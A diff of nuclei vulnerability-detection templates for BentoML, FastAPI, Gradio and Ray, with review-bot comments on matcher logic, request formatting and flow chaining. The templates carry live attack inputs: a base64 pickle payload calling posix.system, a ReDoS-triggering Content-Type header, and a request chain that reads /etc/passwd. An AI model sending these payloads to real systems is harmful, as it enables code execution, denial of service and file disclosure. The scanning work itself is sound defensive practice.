diff --git a/bentoml/bentoml-rce.yaml b/bentoml/bentoml-rce.yaml index d922209..d1f9d72 100644 --- a/bentoml/bentoml-rce.yaml +++ b/bentoml/bentoml-rce.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-1188 # Insecure Default Initialization of Resource tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning -requests: +http: - method: POST path: - "{{BaseURL}}/summarize" @@ -21,6 +21,7 @@ requests: Content-Type: "application/vnd.bentoml+pickle" body: !!binary | gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4= + matchers-condition: and matchers: - type: word diff --git a/fastapi/fastapi_dos.yaml b/fastapi/fastapi_dos.yaml index 54ae86b..fd74a99 100644 --- a/fastapi/fastapi_dos.yaml +++ b/fastapi/fastapi_dos.yaml @@ -1,7 +1,7 @@ id: fastapi-redos info: name: Check FastAPI ReDoS Vulnerability in Form Data Parsing - author: DanMcInerney, byt3bl33d3r, nicecatch2000 + author: DanMcInerney, byt3bl33d3r, nicecatch2000, daffainfo severity: high description: Checks for ReDoS vulnerability in FastAPI when parsing form data with a malicious Content-Type header. reference: @@ -11,13 +11,18 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cwe-id: CWE-400 # Resource Exhaustion tags: fastapi, redos, dos, vulnerability, ai, ml, protectai, huntr -requests: - - method: POST - path: - - "{{BaseURL}}/submit/" - headers: - Content-Type: "application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'" - body: "input=1" + +http: + - raw: + - |+ + POST /submit/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded; !="\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ + Content-Length: 7 + + input=1 + unsafe: true matchers-condition: and matchers: - type: status 
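Review bot: The added `matchers-condition: and` makes every entry under `matchers:` mandatory, but the list is cut off after `- type: word`, so it is not visible whether more than one matcher follows or whether all of them are expected to hit on the same response; nuclei's default is `or`, so this line silently tightens detection. A one-line comment above it, `# every matcher below must hit (state what each one confirms here)`, would make the tightening reviewable. The `!!binary` body is also undocumented; it appears to reference `posix.system` with a harmless placeholder string, and a comment above `body:` saying what observable effect the word matcher keys on would let a maintainer judge the check without decoding the payload.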
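Review bot: The raw request's Content-Type value now ends in a run of bare backslashes with no terminator, whereas the removed header value ended its run with `\'`; because the block scalar is literal, the bytes on the wire have changed, so the new form should be checked against the referenced advisory to confirm it still exercises the slow-parse case the template claims to detect. `|+` also keeps the newline after `input=1`, giving a body one byte longer than the declared `Content-Length: 7`; with `unsafe: true` the bytes are presumably sent as written, so either `|-` or a corrected length is needed — TODO confirm how nuclei's raw client treats the surplus byte. A comment above `unsafe: true`, `# header is deliberately malformed; unsafe keeps the client from normalizing it`, would record why the flag is required, if that is indeed the reason.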
@@ -25,5 +30,7 @@ requests: - 500 - 502 - 504 - - type: time - time: 5000 # Milliseconds, you may adjust this threshold based on expected response times \ No newline at end of file + + - type: dsl + dsl: + - 'duration>=5' \ No newline at end of file diff --git a/gradio/gradio-lfi.yaml b/gradio/gradio-lfi.yaml index 43ae8b6..1976229 100644 --- a/gradio/gradio-lfi.yaml +++ b/gradio/gradio-lfi.yaml @@ -1,7 +1,7 @@ id: gradio-local-file-include info: name: Gradio Local File Read Vulnerability - author: ozelis, DanMcInerney + author: ozelis, DanMcInerney, daffainfo severity: high description: This nuclei template checks for Local File Read vulnerability in Gradio applications. reference: @@ -13,7 +13,9 @@ info: cve-id: CVE-2024-1561 tags: gradio, lfi, local-file-include, python, api, ai, machine-learning, huntr -requests: +flow: http(1) && http(2) && http(3) + +http: - method: GET path: - "{{BaseURL}}/config" @@ -26,20 +28,18 @@ requests: json: - ".components[0].id" - - method: POST - path: - - "{{BaseURL}}/component_server" + - raw: + - | + POST /component_server HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json - headers: - Content-Type: application/json - - body: | - { - "component_id": "{{component_id}}", - "data": "/etc/passwd", - "fn_name": "move_resource_to_block_cache", - "session_hash": "aaaaaaaaaaa" - } + { + "component_id": "{{component_id}}", + "data": "/etc/passwd", + "fn_name": "move_resource_to_block_cache", + "session_hash": "aaaaaaaaaaa" + } extractors: - type: regex @@ -48,16 +48,16 @@ requests: internal: true group: 1 regex: - - "\"(.+)\"" + - '"(.+)"' - method: GET path: - "{{BaseURL}}/file={{extracted_content}}" - - matchers-condition: and + matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" diff --git a/ray/nuclei-templates/ray-static-lfi.yaml b/ray/nuclei-templates/ray-static-lfi.yaml index a8b3e53..21bb431 100644 --- a/ray/nuclei-templates/ray-static-lfi.yaml 
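Review bot: The new `duration>=5` matcher drops the explanatory comment the removed `time: 5000` line carried, and the unit is no longer stated; nuclei's `duration` is in seconds while the old threshold was milliseconds, so a comment such as `# seconds; raise if the target normally responds slowly` keeps the threshold adjustable by the next maintainer. Both sides of the hunk end with `\ No newline at end of file`; the file should end with a single newline. Under the `matchers-condition: and` set earlier, the status matcher (500/502/504) must also hit, so a request that simply times out with no response is not reported — confirm that is the intended signal for a ReDoS check.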
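Review bot: `flow: http(1) && http(2) && http(3)` is undocumented; since the requests chain extracted values (`component_id` from the first, `extracted_content` from the second), a comment above the line, `# run in order; each step only proceeds if the previous one succeeded`, records why the flow exists. The first two requests appear to carry only extractors and no matchers; confirm that nuclei's flow treats a matcher-less request as a success, otherwise the chain would short-circuit before the final file read and the template would never report.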
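Review bot: As the hunk renders here there is no blank line between `Content-Type: application/json` and the `{` that opens the JSON body in the new raw request; HTTP needs an empty line to terminate the header block, so if the file really lacks it the body would be sent as a malformed header and the `/component_server` request would not carry the JSON. The collapsed rendering may simply have dropped an empty `+` line — verify in the file itself. The extractor quoting change to `'"(.+)"'` is equivalent to the removed form, and adding `part: body` to the final regex matcher is a sensible tightening.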
+++ b/ray/nuclei-templates/ray-static-lfi.yaml @@ -13,7 +13,6 @@ info: cwe-id: CWE-29 tags: ray,ml,cve,huntr,protectai - http: - method: GET path: